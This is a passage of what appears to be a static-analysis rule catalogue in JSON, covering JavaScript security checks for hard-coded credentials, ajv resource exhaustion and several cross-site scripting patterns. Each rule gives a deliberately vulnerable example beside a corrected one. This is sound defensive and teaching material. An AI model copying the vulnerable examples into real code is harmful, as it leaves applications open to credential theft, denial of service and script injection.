pg = require(\"pg\");\n\nconst client = new pg.Client({\n user: \"bob\",\n host: \"database.server.com\",\n database: \"mydb\",\n password: \"correct-horse-battery-staple\",\n port: 3211\n});\nclient.connect();\n\n```\nInstead, user name and password can be supplied through the environment variables `PGUSER` and `PGPASSWORD`, which can be set externally without hard-coding credentials in the source code.\n\n\n## References\n* OWASP: [Use of hard-coded password](https://www.owasp.org/index.php/Use_of_hard-coded_password).\n* Common Weakness Enumeration: [CWE-259](https://cwe.mitre.org/data/definitions/259.html).\n* Common Weakness Enumeration: [CWE-321](https://cwe.mitre.org/data/definitions/321.html).\n* Common Weakness Enumeration: [CWE-798](https://cwe.mitre.org/data/definitions/798.html).\n", - "markdown" : "# Hard-coded credentials\nIncluding unencrypted hard-coded authentication credentials in source code is dangerous because the credentials may be easily discovered. For example, the code may be open source, or it may be leaked or accidentally revealed, making the credentials visible to an attacker. This, in turn, might enable them to gain unauthorized access, or to obtain privileged information.\n\n\n## Recommendation\nRemove hard-coded credentials, such as user names, passwords and certificates, from source code. Instead, place them in configuration files, environment variables or other data stores if necessary. 
If possible, store configuration files including credential data separately from the source code, in a secure location with restricted access.\n\n\n## Example\nThe following code example connects to an HTTP request using an hard-codes authentication header:\n\n\n```javascript\nlet base64 = require('base-64');\n\nlet url = 'http://example.org/auth';\nlet username = 'user';\nlet password = 'passwd';\n\nlet headers = new Headers();\n\nheaders.append('Content-Type', 'text/json');\nheaders.append('Authorization', 'Basic' + base64.encode(username + \":\" + password));\n\nfetch(url, {\n method:'GET',\n headers: headers\n })\n.then(response => response.json())\n.then(json => console.log(json))\n.done();\n\n```\nInstead, user name and password can be supplied through the environment variables `username` and `password`, which can be set externally without hard-coding credentials in the source code.\n\n\n```javascript\nlet base64 = require('base-64');\n\nlet url = 'http://example.org/auth';\nlet username = process.env.USERNAME;\nlet password = process.env.PASSWORD;\n\nlet headers = new Headers();\n\nheaders.append('Content-Type', 'text/json');\nheaders.append('Authorization', 'Basic' + base64.encode(username + \":\" + password));\n\nfetch(url, {\n method:'GET',\n headers: headers\n })\n.then(response => response.json())\n.then(json => console.log(json))\n.done();\n\n```\n\n## Example\nThe following code example connects to a Postgres database using the `pg` package and hard-codes user name and password:\n\n\n```javascript\nconst pg = require(\"pg\");\n\nconst client = new pg.Client({\n user: \"bob\",\n host: \"database.server.com\",\n database: \"mydb\",\n password: \"correct-horse-battery-staple\",\n port: 3211\n});\nclient.connect();\n\n```\nInstead, user name and password can be supplied through the environment variables `PGUSER` and `PGPASSWORD`, which can be set externally without hard-coding credentials in the source code.\n\n\n## References\n* OWASP: [Use of hard-coded 
password](https://www.owasp.org/index.php/Use_of_hard-coded_password).\n* Common Weakness Enumeration: [CWE-259](https://cwe.mitre.org/data/definitions/259.html).\n* Common Weakness Enumeration: [CWE-321](https://cwe.mitre.org/data/definitions/321.html).\n* Common Weakness Enumeration: [CWE-798](https://cwe.mitre.org/data/definitions/798.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-259", "external/cwe/cwe-321", "external/cwe/cwe-798" ], - "description" : "Hard-coding credentials in source code may enable an attacker\n to gain unauthorized access.", - "id" : "js/hardcoded-credentials", - "kind" : "path-problem", - "name" : "Hard-coded credentials", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "9.8" - } - }, { - "id" : "js/resource-exhaustion-from-deep-object-traversal", - "name" : "js/resource-exhaustion-from-deep-object-traversal", - "shortDescription" : { - "text" : "Resources exhaustion from deep object traversal" - }, - "fullDescription" : { - "text" : "Processing user-controlled object hierarchies inefficiently can lead to denial of service." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Resources exhaustion from deep object traversal\nProcessing user-controlled data with a method that allocates excessive amounts of memory can lead to denial of service.\n\nIf the JSON schema validation library `ajv` is configured with `allErrors: true` there is no limit to how many error objects will be allocated. An attacker can exploit this by sending an object that deliberately contains a huge number of errors, and in some cases, with longer and longer error messages. 
This can cause the service to become unresponsive due to the slow error-checking process.\n\n\n## Recommendation\nDo not use `allErrors: true` in production.\n\n\n## Example\nIn the example below, the user-submitted object `req.body` is validated using `ajv` and `allErrors: true`:\n\n\n```javascript\nimport express from 'express';\nimport Ajv from 'ajv';\n\nlet ajv = new Ajv({ allErrors: true });\najv.addSchema(require('./input-schema'), 'input');\n\nvar app = express();\napp.get('/user/:id', function(req, res) {\n\tif (!ajv.validate('input', req.body)) {\n\t\tres.end(ajv.errorsText());\n\t\treturn;\n\t}\n\t// ...\n});\n\n```\nAlthough this ensures that `req.body` conforms to the schema, the validation itself could be vulnerable to a denial-of-service attack. An attacker could send an object containing so many errors that the server runs out of memory.\n\nA solution is to not pass in `allErrors: true`, which means `ajv` will only report the first error, not all of them:\n\n\n```javascript\nimport express from 'express';\nimport Ajv from 'ajv';\n\nlet ajv = new Ajv({ allErrors: process.env['REST_DEBUG'] });\najv.addSchema(require('./input-schema'), 'input');\n\nvar app = express();\napp.get('/user/:id', function(req, res) {\n\tif (!ajv.validate('input', req.body)) {\n\t\tres.end(ajv.errorsText());\n\t\treturn;\n\t}\n\t// ...\n});\n\n```\n\n## References\n* Ajv documentation: [security considerations](https://github.com/ajv-validator/ajv/blob/master/docs/security.md#untrusted-schemas)\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n", - "markdown" : "# Resources exhaustion from deep object traversal\nProcessing user-controlled data with a method that allocates excessive amounts of memory can lead to denial of service.\n\nIf the JSON schema validation library `ajv` is configured with `allErrors: true` there is no limit to how many error objects will be allocated. 
An attacker can exploit this by sending an object that deliberately contains a huge number of errors, and in some cases, with longer and longer error messages. This can cause the service to become unresponsive due to the slow error-checking process.\n\n\n## Recommendation\nDo not use `allErrors: true` in production.\n\n\n## Example\nIn the example below, the user-submitted object `req.body` is validated using `ajv` and `allErrors: true`:\n\n\n```javascript\nimport express from 'express';\nimport Ajv from 'ajv';\n\nlet ajv = new Ajv({ allErrors: true });\najv.addSchema(require('./input-schema'), 'input');\n\nvar app = express();\napp.get('/user/:id', function(req, res) {\n\tif (!ajv.validate('input', req.body)) {\n\t\tres.end(ajv.errorsText());\n\t\treturn;\n\t}\n\t// ...\n});\n\n```\nAlthough this ensures that `req.body` conforms to the schema, the validation itself could be vulnerable to a denial-of-service attack. An attacker could send an object containing so many errors that the server runs out of memory.\n\nA solution is to not pass in `allErrors: true`, which means `ajv` will only report the first error, not all of them:\n\n\n```javascript\nimport express from 'express';\nimport Ajv from 'ajv';\n\nlet ajv = new Ajv({ allErrors: process.env['REST_DEBUG'] });\najv.addSchema(require('./input-schema'), 'input');\n\nvar app = express();\napp.get('/user/:id', function(req, res) {\n\tif (!ajv.validate('input', req.body)) {\n\t\tres.end(ajv.errorsText());\n\t\treturn;\n\t}\n\t// ...\n});\n\n```\n\n## References\n* Ajv documentation: [security considerations](https://github.com/ajv-validator/ajv/blob/master/docs/security.md#untrusted-schemas)\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-400" ], - "description" : "Processing user-controlled object hierarchies inefficiently can lead to denial of service.", - "id" : 
"js/resource-exhaustion-from-deep-object-traversal", - "kind" : "path-problem", - "name" : "Resources exhaustion from deep object traversal", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "7.5" - } - }, { - "id" : "js/xss-through-dom", - "name" : "js/xss-through-dom", - "shortDescription" : { - "text" : "DOM text reinterpreted as HTML" - }, - "fullDescription" : { - "text" : "Reinterpreting text from the DOM as HTML can lead to a cross-site scripting vulnerability." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# DOM text reinterpreted as HTML\nExtracting text from a DOM node and interpreting it as HTML can lead to a cross-site scripting vulnerability.\n\nA webpage with this vulnerability reads text from the DOM, and afterwards adds the text as HTML to the DOM. Using text from the DOM as HTML effectively unescapes the text, and thereby invalidates any escaping done on the text. If an attacker is able to control the safe sanitized text, then this vulnerability can be exploited to perform a cross-site scripting attack.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing text to the page, or one of the other solutions that are mentioned in the References section below.\n\n\n## Example\nThe following example shows a webpage using a `data-target` attribute to select and manipulate a DOM element using the JQuery library. 
In the example, the `data-target` attribute is read into the `target` variable, and the `$` function is then supposed to use the `target` variable as a CSS selector to determine which element should be manipulated.\n\n\n```javascript\n$(\"button\").click(function () {\n var target = $(this).attr(\"data-target\");\n $(target).hide();\n});\n\n```\nHowever, if an attacker can control the `data-target` attribute, then the value of `target` can be used to cause the `$` function to execute arbitrary JavaScript.\n\nThe above vulnerability can be fixed by using `$.find` instead of `$`. The `$.find` function will only interpret `target` as a CSS selector and never as HTML, thereby preventing an XSS attack.\n\n\n```javascript\n$(\"button\").click(function () {\n var target = $(this).attr(\"data-target\");\n\t$.find(target).hide();\n});\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [DOM Based XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://owasp.org/www-community/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", - "markdown" : "# DOM text reinterpreted as HTML\nExtracting text from a DOM node and interpreting it as HTML can lead to a cross-site scripting vulnerability.\n\nA webpage with this vulnerability reads text from the DOM, and afterwards adds the text as HTML to the DOM. 
Using text from the DOM as HTML effectively unescapes the text, and thereby invalidates any escaping done on the text. If an attacker is able to control the safe sanitized text, then this vulnerability can be exploited to perform a cross-site scripting attack.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing text to the page, or one of the other solutions that are mentioned in the References section below.\n\n\n## Example\nThe following example shows a webpage using a `data-target` attribute to select and manipulate a DOM element using the JQuery library. In the example, the `data-target` attribute is read into the `target` variable, and the `$` function is then supposed to use the `target` variable as a CSS selector to determine which element should be manipulated.\n\n\n```javascript\n$(\"button\").click(function () {\n var target = $(this).attr(\"data-target\");\n $(target).hide();\n});\n\n```\nHowever, if an attacker can control the `data-target` attribute, then the value of `target` can be used to cause the `$` function to execute arbitrary JavaScript.\n\nThe above vulnerability can be fixed by using `$.find` instead of `$`. 
The `$.find` function will only interpret `target` as a CSS selector and never as HTML, thereby preventing an XSS attack.\n\n\n```javascript\n$(\"button\").click(function () {\n var target = $(this).attr(\"data-target\");\n\t$.find(target).hide();\n});\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [DOM Based XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://owasp.org/www-community/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-079", "external/cwe/cwe-116" ], - "description" : "Reinterpreting text from the DOM as HTML\n can lead to a cross-site scripting vulnerability.", - "id" : "js/xss-through-dom", - "kind" : "path-problem", - "name" : "DOM text reinterpreted as HTML", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "6.1" - } - }, { - "id" : "js/xss-through-exception", - "name" : "js/xss-through-exception", - "shortDescription" : { - "text" : "Exception text reinterpreted as HTML" - }, - "fullDescription" : { - "text" : "Reinterpreting text from an exception as HTML can lead to a cross-site scripting vulnerability." 
- }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Exception text reinterpreted as HTML\nDirectly writing error messages to a webpage without sanitization allows for a cross-site scripting vulnerability if parts of the error message can be influenced by a user.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing user input to the page, or one of the other solutions that are mentioned in the references.\n\n\n## Example\nThe following example shows an exception being written directly to the document, and this exception can potentially be influenced by the page URL, leaving the website vulnerable to cross-site scripting.\n\n\n```javascript\nfunction setLanguageOptions() {\n var href = document.location.href,\n deflt = href.substring(href.indexOf(\"default=\")+8);\n \n try {\n var parsed = unknownParseFunction(deflt); \n } catch(e) {\n document.write(\"Had an error: \" + e + \".\");\n }\n}\n\n```\n\n## Example\nThis second example shows an input being validated using the JSON schema validator `ajv`, and in case of an error, the error message is sent directly back in the response.\n\n\n```javascript\nimport express from 'express';\nimport Ajv from 'ajv';\n\nlet app = express();\nlet ajv = new Ajv();\n\najv.addSchema({type: 'object', additionalProperties: {type: 'number'}}, 'pollData');\n\napp.post('/polldata', (req, res) => {\n if (!ajv.validate('pollData', req.body)) {\n res.send(ajv.errorsText());\n }\n});\n\n```\nThis is unsafe, because the error message can contain parts of the input. 
For example, the input `{'': 'foo'}` will generate the error `data/ should be number`, causing reflected XSS.\n\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", - "markdown" : "# Exception text reinterpreted as HTML\nDirectly writing error messages to a webpage without sanitization allows for a cross-site scripting vulnerability if parts of the error message can be influenced by a user.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing user input to the page, or one of the other solutions that are mentioned in the references.\n\n\n## Example\nThe following example shows an exception being written directly to the document, and this exception can potentially be influenced by the page URL, leaving the website vulnerable to cross-site scripting.\n\n\n```javascript\nfunction setLanguageOptions() {\n var href = document.location.href,\n deflt = href.substring(href.indexOf(\"default=\")+8);\n \n try {\n var parsed = unknownParseFunction(deflt); \n } catch(e) {\n document.write(\"Had an error: \" + e + \".\");\n }\n}\n\n```\n\n## Example\nThis second example shows an input being validated using the JSON schema validator `ajv`, and in case of an error, the error message is sent directly 
back in the response.\n\n\n```javascript\nimport express from 'express';\nimport Ajv from 'ajv';\n\nlet app = express();\nlet ajv = new Ajv();\n\najv.addSchema({type: 'object', additionalProperties: {type: 'number'}}, 'pollData');\n\napp.post('/polldata', (req, res) => {\n if (!ajv.validate('pollData', req.body)) {\n res.send(ajv.errorsText());\n }\n});\n\n```\nThis is unsafe, because the error message can contain parts of the input. For example, the input `{'': 'foo'}` will generate the error `data/ should be number`, causing reflected XSS.\n\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-079", "external/cwe/cwe-116" ], - "description" : "Reinterpreting text from an exception as HTML\n can lead to a cross-site scripting vulnerability.", - "id" : "js/xss-through-exception", - "kind" : "path-problem", - "name" : "Exception text reinterpreted as HTML", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "6.1" - } - }, { - "id" : "js/unsafe-jquery-plugin", - "name" : "js/unsafe-jquery-plugin", - "shortDescription" : { - "text" : "Unsafe jQuery plugin" - }, - "fullDescription" : { - "text" : "A jQuery plugin that unintentionally constructs HTML from some of its 
options may be unsafe to use for clients." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Unsafe jQuery plugin\nLibrary plugins, such as those for the jQuery library, are often configurable through options provided by the clients of the plugin. Clients, however, do not know the implementation details of the plugin, so it is important to document the capabilities of each option. The documentation for the plugin options that the client is responsible for sanitizing is of particular importance. Otherwise, the plugin may write user input (for example, a URL query parameter) to a web page without properly sanitizing it first, which allows for a cross-site scripting vulnerability in the client application through dynamic HTML construction.\n\n\n## Recommendation\nDocument all options that can lead to cross-site scripting attacks, and guard against unsafe inputs where dynamic HTML construction is not intended.\n\n\n## Example\nThe following example shows a jQuery plugin that selects a DOM element, and copies its text content to another DOM element. 
The selection is performed by using the plugin option `sourceSelector` as a CSS selector.\n\n\n```javascript\njQuery.fn.copyText = function(options) {\n\t// BAD may evaluate `options.sourceSelector` as HTML\n\tvar source = jQuery(options.sourceSelector),\n\t text = source.text();\n\tjQuery(this).text(text);\n}\n\n```\nThis is, however, not a safe plugin, since the call to `jQuery` interprets `sourceSelector` as HTML if it is a string that starts with `<`.\n\nInstead of documenting that the client is responsible for sanitizing `sourceSelector`, the plugin can use `jQuery.find` to always interpret `sourceSelector` as a CSS selector:\n\n\n```javascript\njQuery.fn.copyText = function(options) {\n\t// GOOD may not evaluate `options.sourceSelector` as HTML\n\tvar source = jQuery.find(options.sourceSelector),\n\t text = source.text();\n\tjQuery(this).text(text);\n}\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* jQuery: [Plugin creation](https://learn.jquery.com/plugins/basic-plugin-creation/).\n* Bootstrap: [XSS vulnerable bootstrap plugins](https://github.com/twbs/bootstrap/pull/27047).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", - "markdown" : "# Unsafe jQuery plugin\nLibrary plugins, such as those for the jQuery library, are often configurable through options provided by the clients of the plugin. 
Clients, however, do not know the implementation details of the plugin, so it is important to document the capabilities of each option. The documentation for the plugin options that the client is responsible for sanitizing is of particular importance. Otherwise, the plugin may write user input (for example, a URL query parameter) to a web page without properly sanitizing it first, which allows for a cross-site scripting vulnerability in the client application through dynamic HTML construction.\n\n\n## Recommendation\nDocument all options that can lead to cross-site scripting attacks, and guard against unsafe inputs where dynamic HTML construction is not intended.\n\n\n## Example\nThe following example shows a jQuery plugin that selects a DOM element, and copies its text content to another DOM element. The selection is performed by using the plugin option `sourceSelector` as a CSS selector.\n\n\n```javascript\njQuery.fn.copyText = function(options) {\n\t// BAD may evaluate `options.sourceSelector` as HTML\n\tvar source = jQuery(options.sourceSelector),\n\t text = source.text();\n\tjQuery(this).text(text);\n}\n\n```\nThis is, however, not a safe plugin, since the call to `jQuery` interprets `sourceSelector` as HTML if it is a string that starts with `<`.\n\nInstead of documenting that the client is responsible for sanitizing `sourceSelector`, the plugin can use `jQuery.find` to always interpret `sourceSelector` as a CSS selector:\n\n\n```javascript\njQuery.fn.copyText = function(options) {\n\t// GOOD may not evaluate `options.sourceSelector` as HTML\n\tvar source = jQuery.find(options.sourceSelector),\n\t text = source.text();\n\tjQuery(this).text(text);\n}\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP 
[DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* jQuery: [Plugin creation](https://learn.jquery.com/plugins/basic-plugin-creation/).\n* Bootstrap: [XSS vulnerable bootstrap plugins](https://github.com/twbs/bootstrap/pull/27047).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-079", "external/cwe/cwe-116", "frameworks/jquery" ], - "description" : "A jQuery plugin that unintentionally constructs HTML from some of its options may be unsafe to use for clients.", - "id" : "js/unsafe-jquery-plugin", - "kind" : "path-problem", - "name" : "Unsafe jQuery plugin", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "6.1" - } - }, { - "id" : "js/xss", - "name" : "js/xss", - "shortDescription" : { - "text" : "Client-side cross-site scripting" - }, - "fullDescription" : { - "text" : "Writing user input directly to the DOM allows for a cross-site scripting vulnerability." 
- }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Client-side cross-site scripting\nDirectly writing user input (for example, a URL query parameter) to a webpage without properly sanitizing the input first, allows for a cross-site scripting vulnerability.\n\nThis kind of vulnerability is also called *DOM-based* cross-site scripting, to distinguish it from other types of cross-site scripting.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing user input to the page, or one of the other solutions that are mentioned in the references.\n\n\n## Example\nThe following example shows part of the page URL being written directly to the document, leaving the website vulnerable to cross-site scripting.\n\n\n```javascript\nfunction setLanguageOptions() {\n var href = document.location.href,\n deflt = href.substring(href.indexOf(\"default=\")+8);\n document.write(\"\");\n document.write(\"\");\n}\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", - "markdown" : "# Client-side cross-site scripting\nDirectly writing user input (for example, a URL query parameter) to a webpage without properly sanitizing the input first, allows for a 
cross-site scripting vulnerability.\n\nThis kind of vulnerability is also called *DOM-based* cross-site scripting, to distinguish it from other types of cross-site scripting.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing user input to the page, or one of the other solutions that are mentioned in the references.\n\n\n## Example\nThe following example shows part of the page URL being written directly to the document, leaving the website vulnerable to cross-site scripting.\n\n\n```javascript\nfunction setLanguageOptions() {\n var href = document.location.href,\n deflt = href.substring(href.indexOf(\"default=\")+8);\n document.write(\"\");\n document.write(\"\");\n}\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-079", "external/cwe/cwe-116" ], - "description" : "Writing user input directly to the DOM allows for\n a cross-site scripting vulnerability.", - "id" : "js/xss", - "kind" : "path-problem", - "name" : "Client-side cross-site scripting", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "6.1" - } - }, { - "id" : "js/reflected-xss", - "name" : "js/reflected-xss", - 
"shortDescription" : { - "text" : "Reflected cross-site scripting" - }, - "fullDescription" : { - "text" : "Writing user input directly to an HTTP response allows for a cross-site scripting vulnerability." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Reflected cross-site scripting\nDirectly writing user input (for example, an HTTP request parameter) to an HTTP response without properly sanitizing the input first, allows for a cross-site scripting vulnerability.\n\nThis kind of vulnerability is also called *reflected* cross-site scripting, to distinguish it from other types of cross-site scripting.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing user input to the response, or one of the other solutions that are mentioned in the references.\n\n\n## Example\nThe following example code writes part of an HTTP request (which is controlled by the user) directly to the response. 
This leaves the website vulnerable to cross-site scripting.\n\n\n```javascript\nvar app = require('express')();\n\napp.get('/user/:id', function(req, res) {\n if (!isValidUserId(req.params.id))\n // BAD: a request parameter is incorporated without validation into the response\n res.send(\"Unknown user: \" + req.params.id);\n else\n // TODO: do something exciting\n ;\n});\n\n```\nSanitizing the user-controlled data prevents the vulnerability:\n\n\n```javascript\nvar escape = require('escape-html');\n\nvar app = require('express')();\n\napp.get('/user/:id', function(req, res) {\n if (!isValidUserId(req.params.id))\n // GOOD: request parameter is sanitized before incorporating it into the response\n res.send(\"Unknown user: \" + escape(req.params.id));\n else\n // TODO: do something exciting\n ;\n});\n\n```\n\n## References\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", - "markdown" : "# Reflected cross-site scripting\nDirectly writing user input (for example, an HTTP request parameter) to an HTTP response without properly sanitizing the input first, allows for a cross-site scripting vulnerability.\n\nThis kind of vulnerability is also called *reflected* cross-site scripting, to distinguish it from other types of cross-site scripting.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing user input to the response, or one of the other solutions that are mentioned in the references.\n\n\n## Example\nThe 
following example code writes part of an HTTP request (which is controlled by the user) directly to the response. This leaves the website vulnerable to cross-site scripting.\n\n\n```javascript\nvar app = require('express')();\n\napp.get('/user/:id', function(req, res) {\n if (!isValidUserId(req.params.id))\n // BAD: a request parameter is incorporated without validation into the response\n res.send(\"Unknown user: \" + req.params.id);\n else\n // TODO: do something exciting\n ;\n});\n\n```\nSanitizing the user-controlled data prevents the vulnerability:\n\n\n```javascript\nvar escape = require('escape-html');\n\nvar app = require('express')();\n\napp.get('/user/:id', function(req, res) {\n if (!isValidUserId(req.params.id))\n // GOOD: request parameter is sanitized before incorporating it into the response\n res.send(\"Unknown user: \" + escape(req.params.id));\n else\n // TODO: do something exciting\n ;\n});\n\n```\n\n## References\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-079", "external/cwe/cwe-116" ], - "description" : "Writing user input directly to an HTTP response allows for\n a cross-site scripting 